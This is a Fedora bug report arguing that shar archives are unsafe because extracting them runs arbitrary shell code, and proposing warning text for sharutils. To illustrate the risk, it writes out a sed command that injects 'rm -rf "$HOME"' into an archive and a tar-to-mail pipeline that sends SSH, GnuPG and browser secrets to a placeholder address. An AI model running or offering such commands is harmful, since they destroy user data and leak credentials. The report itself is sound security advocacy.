From Bugzilla Helper: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 Description of problem: Yum recommends that users install sharutils "if you send binary files through mail". The package description notes that email is "problematic for regular binary files". Since shar is deeply scary from a security point of view, and mail clients and servers that break on binary are pretty rare now (and are better worked around using base64 or even uuencode), I think this might benefit from a change. I'm not at all convinced that `unshar' is a tool that it's even a good idea to have on a modern UNIX, given that it's design purpose appears to be running code from remote, possibly untrusted, sources. Consider: echo "test file" > test shar test > test.shar sed -i 's/exit 0/rm -rf "$HOME"; exit 0/g' test.shar and the resulting "fun" for the user who runs the file or uses `unshar' to extract it. Don't try that in a user account with data you care about. Also consider what could be accomplished with: tar cf - 2>/dev/null .ssh .gnupg .mozilla/firefox/*.default/*.db .evolution/*.db \ | gzip | mail -s "sucker" "my-addr" or a little script to try to extract some email addresses from common clients and mail its self out. A big risk? Not really - many people won't even know what to do with shar archives now. At least FC4 defaults to opening them with a text editor (tested in evo, thunderbird). Perhaps this package description might be better: "The sharutils package contains the GNU shar utilities, a set of tools for encoding and decoding packages of files (in binary or text format) in a special plain text format called shell archives (shar). The shar format has now been largely superceded by base64-encoded MIME for sending binaries through email, its most common use. WARNING WARNING WARNING The shar format has some serious inherent security problems, given that extracting an archive involves running whatever shell code is in the archive, including possibly malicious code. DO NOT EXTRACT SHAR ARCHIVES FROM UNTRUSTED SOURCES. Using unshar instead of just running the archive will not protect you, as it simply calls out to the shell. This tool is provided for legacy compatibility only. It's recommended that you consider alternatives such as the MIME attachment support in `mutt' and `pine', or a tool like `uudeview' for MIME/Base64 and/or uuencode, in preference to using shar." Also, maybe it's a good idea to patch shar so the comments don't say: # This is a shell archive (produced by GNU sharutils 4.2.1). # To extract the files from this archive, save it to some FILE, remove # everything before the `!/bin/sh' line above, then type `sh FILE'. but rather # This is a shell archive (produced by GNU sharutils 4.2.1). # # Do not extract this archive if it is not from a source you trust completely, # or you have read this entire script in detail. Extracting this archive # involves running a program with permission to do whatever it wants in your # name, such as deleting your files or sending them to somebody else. # # To extract the files from this archive, save it to some FILE, remove # everything before the `!/bin/sh' line above, then type `sh FILE'. Any thoughts? Version-Release number of selected component (if applicable): sharutils-4.2.1-27 How reproducible: Always Steps to Reproduce: n/a Actual Results: n/a Expected Results: n/a Additional info:
This report targets the FC3 or FC4 products, which have now been EOL'd. Could you please check that it still applies to a current Fedora release, and either update the target product or close it ? Thanks.
fixed in current FC release